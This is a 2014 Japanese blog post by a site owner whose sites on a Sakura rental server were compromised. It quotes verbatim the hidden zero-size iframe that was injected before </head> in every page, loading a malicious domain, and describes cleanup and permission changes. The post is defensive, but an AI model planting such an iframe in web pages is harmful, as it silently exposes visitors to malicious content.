改竄さくらレンタルサーバー

790views/2014-01-21

さくらレンタルサーバー使用のサイト全部でGoogle Safe Browsingが働いてアクセス不能になりました。</head>の前にこのコードが改ざんされていました。

<iframe src="http://bodytang.com/wp-content/files"" width="0" height="0" frameborder="0"></iframe></head>

.htmlファイルと.phpやその他を問わずHTML記述のある</head>の直前にiframeの改竄が挿入されています。これを削除して再アップすればChrome、Safariで警告が無くなりました。Firefoxはいつもは警告が出るのにタイミング的に早すぎるのか改竄されてるURLにアクセスできてしまいGoogle Safe Browsingが効いてないようです。IEはいつも最初から警告すらでませんね、どうしようもないブラウザです。

階層も関係なく全部のHTML記述ファイルが対象でした。全ての階層で、という事で全ページファイルです。かつマルチドメインしていた同居ドメイン全部でした。

  1. /index.html や /index.php 《改竄です!!》
  2. /第二階層/abc.html 《ダメです!!》
  3. /第二階層/第三階層/def.html 《要は全ペーシ!!》

この悪質ドメインを読み込むような事は危険ですよとアクセスできない仕組みです。とにかく片っ端からこのドメイン記述が無いか検索したり置換したりして改竄箇所を治し(直し)ましょう。直してアップしてもアクセスできない場合はサーバー上のファイルを削除して再アップすると治ります。

bodytang_com-chrome

bodytang_com-safari

さくらレンタルサーバー改ざん対処法

基本的に、一度改ざんさているということは記述箇所を直してアップしても、また改ざんされるのは理解できると思います。特に改ざんされた時と状況は変わってないからです。当方も何度か経験していて、直したからもう大丈夫だろうと人間なぜか思うようです。根本的な解決はサーバーエンジニアがスパムに勝つか、パーミッションを変更するかです。

今のところ経験上パーミッションを404にした後は改ざんされません。通常は644が普通だと思います。でも644のままだとまた改ざんされる危険性はかなり高いです。パーミッションを404にすると上書きが出来ないのでFTPアップロードできなくなります。

従って方法は、

  1. 一旦644にしてアップして404にする
  2. ファイルを削除してアップして404にする

のどちらかで404環境で管理できます。かなり面倒ですが危険は防げます。再度また改ざんされると作業量も大変です。そして、最も安全な解決方法は怪しげなサーバーは引っ越しが吉という事です。当方が今回被害を受けたサーバーはさくらレンタルサーバーのスタンダードです。

しかし、644だったファイルを削除して今アップロードすると604になって警告が消えたりします。改竄箇所も勝手に治ってたりします。サーバー側で今まさに対応中と見受けられます。

ちなみにWordPressの</head>も改ざん

WordPressのプログラムファイル内に</head>箇所は結構あります。

  • wp-links-opml.php
  • wp-login.php
  • /wp-admin/ 内に11ファイル程度
  • /wp-content/ 内に数ファイル(テーマ数による)
  • /wp-includes/ 内に29ファイル程度

かなりありますね。その</head>箇所直前が全部改ざんされています。WordPress改竄のいろんな種類がこんなのまとめたくありませんが、まとまってきました。

その1 php記述箇所改竄「気付けない検索結果からだけリダイレクト」

その2 MySQL乗っ取り改竄「Hacked by Krad Xin」BD GREY HAT HACKERS

その3 今回の</head>直前挿入改竄

790views/2014-01-21

関連おすすめ記事